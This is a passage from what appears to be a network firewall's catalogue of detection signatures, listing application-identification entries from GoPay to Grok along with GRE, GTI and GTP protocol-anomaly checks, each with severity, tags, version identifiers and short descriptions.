Last changed: sgpkg-ips-1678-5242
Description: GooodJob offers solution for mobile employee referrals.
Back to top

GoPay

About this situation: Application GoPay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoPay payment system takes the form of an electronic wallet for sending money within the European Union.
Back to top

GoPlan

About this situation: Application GoPlan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Goplan's SaaS service is for online project management and team-based collaboration. Goplan lets one keep track of projects and collaborate with colleagues securely through an intuitive user interface.
Back to top

Gorkana

About this situation: Application Gorkana detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Gorkana provides integrated media intelligence solutions. The company connects organizations to critical information and insights to help them control and manage their reputation across various media platforms.
Back to top

Gosquared

About this situation: GoSquared usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: GoSquared is the analytics platform that helps user to take action faster. Integrate with any website or app to monitor, understand and improve business.
Back to top

GoSystem-Tax-RS

About this situation: Application GoSystem-Tax-RS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoSystem is a web based tax software platform that is used by larger CPA firms. Allows multiple staff to work on the same return while others limit a return to a single user. This technology is referred to as Multi-User Concurrent Access technology.
Back to top

GoToAssist

About this situation: Endpoint Context Agent based GoToAssist detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Description: GoToAssist endpoint application has been detected. GoToAssist is a cloud-based tool for remote support, monitoring and service desk management.
Back to top

GoToAssist

About this situation: GoToAssist usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1278-5242
Description: GoToAssist is a remote control application which provides users with secure live-support capability.
Back to top

GoToMeeting

About this situation: GoToMeeting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1610-5242
Description: GoToMeeting is a remote meeting, desktop sharing, and video conferencing software.
Back to top

GoToMyPC

About this situation: GoToMyPC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-630-5211
Description: GoToMyPC provides remote access and computer remote control software.
Back to top

Gototraining

About this situation: GoToTraining usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: An online classroom and desktop sharing software that enables the user to present their screen to other trainees and students via the Internet in real time. Source: Wikipedia
Back to top

Gotowebinar

About this situation: GoToWebinar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: An online conference and webinar sharing software that enables the user to present their screen to others across globe via the Internet in real time.
Back to top

Gourmondo

About this situation: Gourmondo traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-630-5211
Description: Gourmondo is an online merchant that sells food and alcohol.
Back to top

Government

About this situation: Sites sponsored by branches, bureaus or agencies of any level of government, except for the armed forces.
Context: URL Application Context
Severity: 1
Tags: Government, Business Usage, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by branches, bureaus or agencies of any level of government, except for the armed forces.
Back to top

GPass

About this situation: Gpass usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-924-5242
Description: GPass is a free proxy-based tool for internet privacy and security that allows users to bypass firewalls and protect their identity online. This application may not entirely identify/block all versions of GPass.
Back to top

GQueues

About this situation: Application GQueues detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GQueues is a full-featured task manager for your Google Account and Google Apps account.
Back to top

gQUIC

About this situation: gQUIC traffic
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-1419-5242
Description: gQUIC protocol usage. gQUIC is a transport layer protocol which works over UDP. This version of QUIC was the original draft from Google. An official version was later specified in RFC 9000, which is identified by network application QUIC.
Back to top

GrabCAD

About this situation: Application GrabCAD detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GrabCAD Workbench is a softrware to share files, work with partners and complete projects on time
Back to top

Graboid

About this situation: Graboid usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A video streaming site.
Back to top

Gracenote

About this situation: Gracenote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-595-5211
Description: Gracenote usage has been detected. Gracenote is database of audio recording metadata.
Back to top

Graduates

About this situation: Application Graduates detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Graduates is a social network that helps users to keep in touch with friends.
Back to top

Graduway

About this situation: Application Graduway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Graduway provides white-labeled alumni networking platforms to schools, universities and companies that wish to offer past and present students and employees with a way to connect and enjoy professional opportunities.
Back to top

Grafetee

About this situation: Grafetee usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-602-5211
Description: Grafetee is a web-based location sharing service.
Back to top

GrammarBase

About this situation: Application GrammarBase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Grammarbase.com is an online grammar checker
Back to top

Grammarly

About this situation: Endpoint Context Agent based Grammarly detection
Context: EI Correlation
Severity: 1
Tags: Productivity, Endpoint
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Description: Grammarly is a cloud based typing assistant.
Back to top

Grammarly

About this situation: Grammarly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-773-5211
Description: Grammarly is an online service that provides writing aid, such as grammar check and correction as well as plagiarism check.
Back to top

GrapeCity

About this situation: Application GrapeCity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GrapeCity ComponentOne Studio provides application developers with innovative UI and data management controls for all major platforms.
Back to top

Grappster

About this situation: Application Grappster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Grappster connect cloud apps like sales
Back to top

Grasshopper

About this situation: Application Grasshopper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Grasshopper enables entrepreneurs to build a virtual office that connects callers to employees.
Back to top

Gravatar

About this situation: Gravatar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-769-5211
Description: Gravatar is a service that lets weblogs and similar sites display user-provided pictures from a central database.
Back to top

GravityMarket-Platform

About this situation: Application GravityMarket-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GravityMarket by Acumium is for merchants who need enterprise-class functionality without the weight of open-source ecommerce platforms.
Back to top

GRC-Cloud

About this situation: Application GRC-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Resolver's integrated platform supports application areas including Risk Assessment, Internal Control, Internal Audit, Compliance Management, Enterprise Risk Management and Incident Management.
Back to top

GRE-unknown-version

About this situation: A GRE header contains unknown version number
Context: GRE without parameters
Severity: 2
Tags: General Packet Validation Situations
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-562-5211
Description: A GRE protocol header contains unknown version number. Risk analysis: Risk level is low. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

Great-West-Retirement-Services

About this situation: Application Great-West-Retirement-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Great-West Financial helps millions of Americans, their companies and employers build financial security.
Back to top

Gree

About this situation: GREE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese social networking service that allows users to meet friends, send and receive messages, share photos and videos, and join forums.
Back to top

Green-Cloud

About this situation: Application Green-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Green Cloud - cloud solutions provider for small and medium-sized businesses
Back to top

Greenclouds

About this situation: Application Greenclouds detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Greenclouds provides suite of cloud-based tools.
Back to top

Greenhouse

About this situation: Application Greenhouse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Greenhouse is a recruiting optimization platform to help companies build and scale recruiting processes. It automates and measures sourcing activity social media, referrals, job boards, in-person events, meetups, campus recruiting.
Back to top

GreenQloud

About this situation: Application GreenQloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GreenQloud is a cloud infrastructure software solutions company whose services feature an easy-to-use, self-service web console and advanced industry compatible API controls for full automation of IT services.
Back to top

GreenRope

About this situation: Application GreenRope detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GreenRope provides solution to consolidate and automate user daily sales and marketing operations.
Back to top

Greenshot

About this situation: Endpoint Context Agent based Greenshot detection
Context: EI Correlation
Severity: 1
Tags: Monitoring, Endpoint
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Description: Greenshot endpoint application has been detected. Greenshot is an open-source screenshot program for Windows.
Back to top

Greenview-Data-Email

About this situation: Application Greenview-Data-Email detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Greenview Data Email is cloud Email Services for Business. Encryption, Archiving, Hosting, Spam Filtering.
Back to top

Greenway

About this situation: Application Greenway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: greenwaymedical provides tools that helps build, design, innovate the clinical, financial and administrative information.
Back to top

Greenwicheantime.com

About this situation: Greenwicheantime.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-601-5211
Description: Greenwicheantime.com is a service that provides time in different timezones.
Back to top

Grepsr

About this situation: Application Grepsr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Grepsr is a Cloud based, managed data extraction and web scraping service to crawl and extract data from websites, emails, documents etc.
Back to top

GrexIt

About this situation: Application GrexIt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GrexIt gives you shared labels in your Google Apps email. Shared Labels are a great way to share important email conversations with your team, assign tasks to team members and track their status.
Back to top

Greytip

About this situation: Application Greytip detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Greytip Software Pvt. Ltd. is a focused HR/Payroll software solutions company serving clients in India and GCC. We provide a wide range of solutions that enable HR and Payroll managers to provide employee services accurately, quickly and efficiently.
Back to top

GRE_Checksum-Mismatch

About this situation: Invalid checksum in GRE header
Context: GRE without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The GRE header contained an invalid checksum. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

GRE_Header-Short

About this situation: Unexpected end of GRE header
Context: GRE without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The GRE header was too short . Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

GRE_Keepalive

About this situation: GRE Protocol keepalive packet encountered
Context: GRE without parameters
Severity: 1
Tags: General Packet Validation Situations
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Description: GRE tunnel keepalive packet detected. Note: This situation is handled similar manner than the actual sanity situations i.e. all other matching constraints than the situation id is ignored because the GRE keepalive is an empty message sent to tunnel. Permitting this packet will cause it to be handled as non tunnel packets i.e. outermost IP-addresses are used for access matching. Also please note that this situation must be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

GRE_PPTP-Version

About this situation: A GRE header contains PPTP version number
Context: GRE without parameters
Severity: 2
Tags: General Packet Validation Situations
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Description: A GRE protocol header contains PPTP version number. Note: PPTP tunnels are encrypted, so the contents of the tunnel cannot be inspected by the GRE tunnel agent even if rematch for the tunnel traffic is requested. Risk analysis: Risk level is low. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

GRE_Tunnel-Other-Protocol

About this situation: Other than specified for tunneling rematching GRE Protocol Type value encountered
Context: GRE without parameters
Severity: 1
Tags: Potential Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1475-5242
Description: Other than supported GRE Protocol Type value encountered in GRE service that is configured for tunneling rematching. Note: This situation is handled similar manner than the actual sanity situations i.e. all other matching constraints than the situation id is ignored. Permitting this packet will cause it to be handled as non tunnel packets i.e. outermost IP-addresses are used for access matching. Also please note that this situation must be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

GridVision

About this situation: Application GridVision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GridVision is an IT automation and management platform that provides powerful automation and management tools for virtualized, cloud-based or on-premise assets.
Back to top

Grockit

About this situation: Grockit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Grockit prepares students for the SAT, ACT, GMAT, LSAT and GRE standardized exams. Students can take practice tests while collaborating online with other users. Grockit is a live online multiplayer game providing test prep. It offers interactive play with other people studying for the same test.
Back to top

Grok

About this situation: Grok usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Description: Grok is an AI chatbot developed by Elon Musks xAI company. This application is meant for blocking the application.
Back to top

Groove

About this situation: Application Groove detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Groove is a provider of online help desk support software.
Back to top

Groove Music

About this situation: Endpoint Context Agent based Groove Music detection
Context: EI Correlation
Severity: 1
Tags: Streaming Media, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: Groove Music endpoint application detected. Groove Music is a first party app installed by default on Windows 10 devices.
Back to top

Grooveshark

About this situation: Grooveshark usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Grooveshark is an online audio streaming service.
Back to top

Grosocial

About this situation: Application Grosocial detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GroSocial is web-based easy-to-use social media software suite that helps you build impressive social profiles, run contests and much more.
Back to top

GROU.PS

About this situation: Application GROU.PS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GROU.PS is online community site creator, Social Networking Platform.
Back to top

GroupCamp-Project

About this situation: Application GroupCamp-Project detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Project by GroupCamp is web-based project management suite with file sharing, task management, discussions, enterprise wiki, milestones, and time-tracking.
Back to top

GroupDocs-Document-Manipulation-APIs

About this situation: Application GroupDocs-Document-Manipulation-APIs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GroupDocs offers .NET/Java libraries and cloud APIs that let you view, compare, annotate, sign and convert over 45 common document formats in your own app.
Back to top

GroupMe

About this situation: Application GroupMe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GroupMe is a mobile group messaging app.
Back to top

Groupon

About this situation: Groupon usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-595-5211
Description: Groupon is a deal-of-the-day website that features discounted gift certificates usable at local or national companies. Source: Wikipedia
Back to top

GroupQuality

About this situation: Application GroupQuality detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GroupQuality - all-in-one market research software to capture customer feedback, collect insight, knowledge data.
Back to top

Groupspaces

About this situation: Application Groupspaces detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GroupSpaces is developing technology to help real-world groups and communities manage themselves online. GroupSpaces's software helps manage over 1 million memberships for sports clubs, charities, university societies, national associations and many other groups.
Back to top

Grovo

About this situation: Application Grovo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Grovo workplace learning company combines beautiful technology, engaging content, and hands-on advisory support to deliver a better way to learn at work.
Back to top

Gses

About this situation: Application Gses detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GSE Systems, Inc. provides performance improvement solutions to the energy and process industries. GSE Systems improve human performance though turnkey training, unique visualization and simulation applications, and our staff of instructors, as well as plant improvement through our engineering expertise and use of technology to improve plant design, commissioning and operations.
Back to top

GT-Nexus

About this situation: Application GT-Nexus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GT Nexus, is a cloud supply chain platform provider, runs an on-demand global supply chain management platform that is used by organizations to manage global logistics and trade processes
Back to top

GTI-File-Reputation_Connection_to_cloud_acquired

About this situation: Connection to GTI file reputation cloud was acquired
Context: GTI
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: Connection to GTI File Reputation Cloud was acquired. Ready to perform queries.
Back to top

GTI-File-Reputation_Connection_to_cloud_lost

About this situation: Connection to GTI file reputation cloud was lost
Context: GTI
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: Connection to GTI File Reputation Cloud was lost. Unable to perform queries.
Back to top

GTI_Cannot_connect_to_cloud

About this situation: Could not connect to GTI cloud service
Context: GTI
Severity: 8
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: Could not connect to GTI cloud service. Unable to perform queries or download database.
Back to top

GTmetrix

About this situation: Application GTmetrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GTmetrix is tooll that analyzes your page's speed performance. Using Page Speed and YSlow, GTmetrix generates scores for your pages and offers actionable recommendations on how to fix them.
Back to top

GTP_BCD-Invalid-Encoding

About this situation: BCD encoding for field in Information Element is malformed
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Some information elements such as IMSI or RAI, contains numbers encoded in BCD format. The situation occurs when fields which use BCD encoding does not follow GTP specification. This may be an attack attempt or fuzzing scan. Risk analysis: Risk level is low.
Back to top

GTP_Conditional-IE-Missing

About this situation: Message does not contain some required conditional Information Elements
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Message does not contain some Conditional Information Elements which should be present in this case. According to 3GPP Technical Specification, some Information Elements are required under certain conditions, but received message did not contain some of them. Risk analysis: Risk level is low.
Back to top

GTP_Connection-Allowed

About this situation: GTP-Tunneled Connection Allowed
Context: GTP without parameters
Severity: 1
Tags: Access
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: New GTP-tunneled connection was allowed.
Back to top

GTP_Duplicated_Message

About this situation: GTP Duplicated Message
Context: GTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: GTP duplicated message was detected This situation will happen when the same message will be seen twice on interface. In context of the message, engine will check if particular request or response message was not already seen on interface by checking the message content and the state of tunnel. This situation is only informative and may be safely ignored unless it is not a flood attack. Duplicated messages are natural since GTP uses UDP protocol as transport layer. Risk analysis: Risk level is low.
Back to top

GTP_Fragmentation-Exceeded

About this situation: GTP Fragmentation Exceeded
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: IP payload is greater than fragmentation limit. Risk analysis: Risk level is low.
Back to top

GTP_GPDU-Access-Denied

About this situation: GTP GPDU Access Denied
Context: GTP without parameters
Severity: 5
Tags: Potential Probe
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-577-5211
Description: GPDU (examined by TEID value) does not belong to any active PDP context. This situation will happen when user plane tunnel data is transmitted before relevant PDP Context has been established, or after active PDP Context was deleted. Risk analysis: Risk level is high.
Back to top

GTP_GSN-Incorrect-Reset

About this situation: GTP GSN Equipment reset
Context: GTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Description: GTP GSN Equipment reset was detected This situation will happen when Restart Counter field in recovery Information Element from paticular GSN will change, in way that is not defined in 3GPP specification. If somebody is maitaindain GSN network, add this situation to exeption and refresh policy. Please remember to remove this situation from exeption when maintaindence of GSN network will over. This can also signalize an attack and attempt of remove all existing and established PDP CTX from particular device. Risk analysis: Risk level is medium.
Back to top

GTP_GSN-Missing-Address

About this situation: GSN address is missing
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: GSN User Plane or Control Plane IP address stored in Information Element is missing. Risk analysis: Risk level is low.
Back to top

GTP_GSN-Reset

About this situation: GTP GSN Equipment reset
Context: GTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: GTP GSN Equipment reset was detected This situation will happen when Restart Counter field in recovery Information Element of Echo Response message from paticular GSN will change. Such scenario is used to signalize that GTP equipment was restarted. This situation is only informative. For details please refer to 3GPP TS 29.060 V12.0.0. Risk analysis: Risk level is low.
Back to top

GTP_Inconsistent-Length

About this situation: One of information elements have a length inconsistent with the 3GPP Technical Specification
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: One of information elements have a length inconsistent with the 3GPP Technical Specification. Risk analysis: Risk level is medium.
Back to top

GTP_Invalid-Address-Length

About this situation: Information element contains address with invalid length.
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: One of the information elements contains an address which is neither 4 (IPv4) nor 16 (IPv6) octets long. Risk analysis: Risk level is medium.
Back to top

GTP_Invalid-Address-Type

About this situation: Information element contains invalid address type.
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: One of the information elements contains an address of invalid type. Risk analysis: Risk level is medium.
